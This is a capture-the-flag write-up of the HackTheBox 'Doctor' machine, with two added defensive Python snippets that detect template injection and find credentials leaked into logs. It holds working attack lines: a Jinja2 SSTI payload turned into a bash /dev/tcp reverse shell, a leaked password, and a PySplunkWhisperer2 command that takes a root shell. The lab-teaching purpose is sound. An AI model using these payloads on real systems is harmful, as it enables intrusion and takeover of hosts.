Recon

As usual, Nmap goes first. The results are below; the full-port scan gave the same picture: three ports open. Let's start with 80.

# Nmap 7.91 scan initiated Wed Nov 11 18:57:28 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.075s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-06T15:57:27
| Not valid after: 2023-09-06T15:57:27
| MD5: db23 4e5c 546d 8895 0f5f 8f42 5e90 6787
|_SHA-1: 7ec9 1bb7 343f f7f6 bdd7 d015 d720 6f6f 19e2 098b
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 11 18:58:22 2020 -- 1 IP address (1 host up) scanned in 53.65 seconds

FootHold

Visiting the box by IP gives us the e-mail address info@doctors.htb, so we add the domain doctors.htb to the hosts file.

Visiting by domain name returns a login page.


User.txt

The page has registration open; after registering, it tells you the account is only valid for 20 minutes.
After logging in, look at the source of the home page: a comment mentions that the archive page is still in testing.

<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

Actually visiting it returns a blank page. The Wappalyzer extension shows that the site runs on Flask, so the language is Python.

LowPrivShell

I was stuck on this step for a long time; it involves a kind of vulnerability that was completely new to me. Thanks to the forum folks for the hint.

We can leave a message on the /post/new page, and the message content shows up in the source of /archive. Combined with the framework and language identified earlier, this points to Server Side Template Injection.
A suitable payload can be found in PayloadsAllTheThings.

# original payload
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
# adapted into a reverse shell
{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/x.x.x.x/port 0>&1 "').read()}}

After executing it we get a shell as the user web.
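The defensive side of the step above, as an added example (not code from the original writeup): the actual fix is to never hand user content to render_template_string or any other template compiler, and as a second layer a pre-save check on submitted posts can flag the delimiter and dunder-attribute patterns this payload relies on. The function names and the sample submissions are constructed.

```python
import re
from html import unescape
from urllib.parse import unquote

# Jinja2 expression, statement and comment delimiters.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\{#")
# Attribute walk used to climb from a template object to Python internals.
DUNDER_WALK = re.compile(r"__(?:class|init|globals|builtins|subclasses|mro|import)__")
# Calls that turn template evaluation into command or code execution.
EXEC_CALLS = re.compile(r"\b(?:popen|system|subprocess|eval|exec|import)\s*\(")


def normalize(text: str) -> str:
    """Undo the encodings a submission may carry so obfuscated delimiters
    (e.g. %7B%7B or &#123;&#123;) are inspected in their decoded form."""
    for _ in range(3):  # a few rounds handles double-encoding
        decoded = unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def audit_user_content(text: str) -> list[str]:
    """Return the reasons a submission looks like template injection.
    An empty list means nothing suspicious was found; this is a review
    aid, not a substitute for never rendering user input as a template."""
    decoded = normalize(text)
    reasons = []
    if TEMPLATE_DELIMS.search(decoded):
        reasons.append("template delimiters")
    if DUNDER_WALK.search(decoded):
        reasons.append("dunder attribute traversal")
    if EXEC_CALLS.search(decoded):
        reasons.append("code/command execution call")
    return reasons


# Constructed submissions: the first has the shape of the payload above.
SAMPLES = {
    "ssti": "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
    "encoded": "%7B%7B7*7%7D%7D",
    "benign": "Appointment moved to Tuesday, see you then!",
}

if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(name, "->", audit_user_content(content) or "clean")
```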


UserShell

After uploading and running linpeas.sh, we find that we are in the adm group, which has permission to read every log under /var/log/. The script also points out that there are some unusual files in that directory.

web@doctor:/var/log/apache2$ ls -la
total 93816
drwxr-x--- 2 root adm 4096 Nov 11 06:53 .
drwxrwxr-x 13 root syslog 4096 Nov 11 06:53 ..
-rw-r----- 1 root adm 75357811 Nov 11 16:38 access.log
-rw-r----- 1 root adm 6626 Sep 28 15:02 access.log.1
-rw-r----- 1 root adm 323 Aug 21 13:00 access.log.10.gz
-rw-r----- 1 root adm 270 Aug 18 12:48 access.log.11.gz
-rw-r--r-- 1 root root 2194472 Jul 27 20:49 access.log.12.gz
-rw-r----- 1 root adm 1493 Sep 23 15:20 access.log.2.gz
-rw-r----- 1 root adm 3951 Sep 22 12:58 access.log.3.gz
-rw-r----- 1 root adm 1341 Sep 19 19:17 access.log.4.gz
-rw-r----- 1 root adm 664054 Sep 15 14:27 access.log.5.gz
-rw-r----- 1 root adm 384 Sep 14 10:07 access.log.6.gz
-rw-r----- 1 root adm 3018 Sep 7 17:24 access.log.7.gz
-rw-r----- 1 root adm 1338 Sep 6 22:46 access.log.8.gz
-rw-r----- 1 root adm 1266 Sep 5 11:58 access.log.9.gz
-rw-r----- 1 root adm 21578 Sep 17 16:23 backup
-rw-r----- 1 root adm 17698860 Nov 11 16:38 error.log
-rw-r----- 1 root adm 3551 Sep 28 15:07 error.log.1
-rw-r----- 1 root adm 476 Sep 7 17:46 error.log.10.gz
-rw-r----- 1 root adm 537 Sep 6 22:47 error.log.11.gz
-rw-r----- 1 root adm 680 Sep 5 11:58 error.log.12.gz
-rw-r----- 1 root adm 341 Sep 5 00:00 error.log.13.gz
-rw-r----- 1 root adm 230 Aug 21 13:07 error.log.14.gz
-rw-r----- 1 root adm 1092 Sep 23 15:42 error.log.2.gz
-rw-r----- 1 root adm 846 Sep 22 13:03 error.log.3.gz
-rw-r----- 1 root adm 655 Sep 22 10:40 error.log.4.gz
-rw-r----- 1 root adm 352 Sep 19 00:00 error.log.5.gz
-rw-r----- 1 root adm 424 Sep 18 00:00 error.log.6.gz
-rw-r----- 1 root adm 428 Sep 17 00:00 error.log.7.gz
-rw-r----- 1 root adm 629 Sep 16 00:00 error.log.8.gz
-rw-r----- 1 root adm 460 Sep 15 00:00 error.log.9.gz
-rw-r--r-- 1 root root 0 Jul 27 17:10 other_vhosts_access.log

We can see that a file named backup exists.
Looking at it, we see that 10.10.14.4 POSTed a password, Guitar123, to reset_password.

10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

Using this password we successfully log in as the user shaun and get user.txt.
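Added example, not from the original writeup: a small scanner over Apache access-log lines that flags the pattern behind this finding, credential material sent in a query string, where anyone who can read the log (the adm group here) can recover it. The parameter and endpoint lists are assumptions; apart from the line quoted above, the sample entries are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache access-log line. The request field may lack the protocol token,
# as the entry recovered from /var/log/apache2/backup above does.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^"\s]+)(?: [^"\s]+)?" (?P<status>\d{3})'
)
# Parameter names that must never travel in a URL, because URLs get logged.
SENSITIVE_PARAMS = {"password", "passwd", "pwd", "pass", "token", "secret", "otp"}
# Endpoints whose inputs belong in the request body, not the query string.
CREDENTIAL_PATHS = {"/login", "/reset_password", "/register", "/change_password"}


def find_leaked_credentials(lines):
    """Return (ip, method, path, reason) for each request that carried
    credential material in its query string, i.e. material now readable by
    anyone who can read the access log (here, members of adm)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log entry; skip rather than guess
        url = urlsplit(m["target"])
        params = parse_qsl(url.query, keep_blank_values=True)
        if not params:
            continue
        hits = {k.lower() for k, _ in params} & SENSITIVE_PARAMS
        if hits:
            reason = "sensitive parameter in query string: " + ", ".join(sorted(hits))
        elif url.path in CREDENTIAL_PATHS:
            reason = f"query parameters sent to credential endpoint {url.path}"
        else:
            continue
        findings.append((m["ip"], m["method"], url.path, reason))
    return findings


# Constructed sample: the first line is the entry quoted above, the other
# two are made up for illustration.
SAMPLE_LOG = [
    '10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"',
    '10.10.14.4 - - [05/Sep/2020:11:18:01 +2000] "GET /archive HTTP/1.1" 200 1024 "-"',
    '10.10.14.9 - - [05/Sep/2020:11:19:45 +2000] "GET /api/items?user=bob&password=hunter2 HTTP/1.1" 200 88 "-"',
]

if __name__ == "__main__":
    for ip, method, path, reason in find_leaked_credentials(SAMPLE_LOG):
        print(f"{ip} {method} {path}: {reason}")
```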

web@doctor:/var/log/apache2$ su - shaun
Password:
shaun@doctor:~$ cd
shaun@doctor:~$ ls
user.txt
shaun@doctor:~$ wc -c user.txt
33 user.txt
shaun@doctor:~$

Privilege Escalation

At this point we remember the port we have not used yet, 8089. Checking it, Splunk is running as root.

shaun@doctor:~$ ps -ef | grep splunk
root 1135 1 0 06:53 ? 00:00:55 splunkd -p 8089 start
root 1137 1135 0 06:53 ? 00:00:00 [splunkd pid=1135] splunkd -p 8089 start [process-runner]
root 94939 1 0 13:28 ? 00:00:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
root 94967 1 0 13:30 ? 00:00:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
shaun 96375 96262 0 16:46 pts/0 00:00:00 grep --color=auto splunk

There is a ready-made script on GitHub, so we just fire it off.

/Documents/HTB/Doctor/SplunkWhisperer2/PySplunkWhisperer2 master
❯ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'" --lhost IP
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp76vowwri.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.16.7:8181/
10.10.10.209 - - [11/Nov/2020 23:48:13] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

We get a shell.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:52546.
bash: cannot set terminal process group (1137): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# cd root
cd root
root@doctor:/root# wc -c root.txt
wc -c root.txt
33 root.txt
root@doctor:/root#